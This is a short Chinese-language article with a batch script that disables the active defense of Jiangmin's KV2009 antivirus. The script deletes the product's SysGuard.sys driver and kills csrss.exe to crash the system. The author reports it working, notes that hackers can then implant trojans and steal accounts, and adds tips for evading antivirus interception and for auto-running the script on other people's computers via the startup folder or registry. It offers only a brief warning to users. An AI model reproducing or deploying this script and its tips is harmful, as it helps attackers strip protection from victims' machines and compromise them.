批处理挑战ＫＶ２００９主动防御

牧马人

现在主动防御功能实在是太火了，所以很多杀毒软件都加入了这个功能，江民KV系列的杀毒软件当然也不例外。但是，利用文本编辑软件新建一个*.bat批处理文件，输入下面这段代码后保存并运行，就可以轻松干掉江民杀毒软件KV2009的主动防御功能了（如图）。

@echo off

del %systemroot%system32driversSysGuard.sys /f /q /s

set app_name=csrss.exe

echo 查找进程%app_name%,准备死机...

(tasklist /nh | findstr /i %app_name%) || (goto dead)

:dead

ntsd -c -q -pn %app_name%

我在虚拟机和本地系统中分别进行了试验，发现这段代码非常管用。它的意思非常简单：首先是删除江民杀毒软件中的一个驱动文件，接着强制结束一个系统文件的进程，造成操作系统死机（之所以要强制死机，是因为杀毒软件的自我保护功能不允许系统非正常地重新启动）。当重新启动后，江民杀毒软件的主动防御功能就失效了，这样黑客就能比较容易地向用户的电脑中植入木马、窃取账号……

如果你是江民杀毒软件的用户，那么此招不得不防，最好经常检查其主动防御功能的工作状态，不然电脑被黑客入侵了都还不知道。

1.在试验前，一定要把江民杀毒软件的SysGuard.sys驱动文件拷贝到其他地方进行备份。因为如果试验成功了，那么江民杀毒软件的主动防御功能就彻底失效了，要想让它恢复就得把备份的SysGuard.sys驱动文件拷贝回去，再重新启动。

2.最好不要把*.bat放在可执行文件里，因为这样在运行时十有八九会被杀毒软件拦截。

3.在别人的电脑上进行试验时，可把*.bat放在启动文件夹中，或采用修改注册表的方式让它自动运行。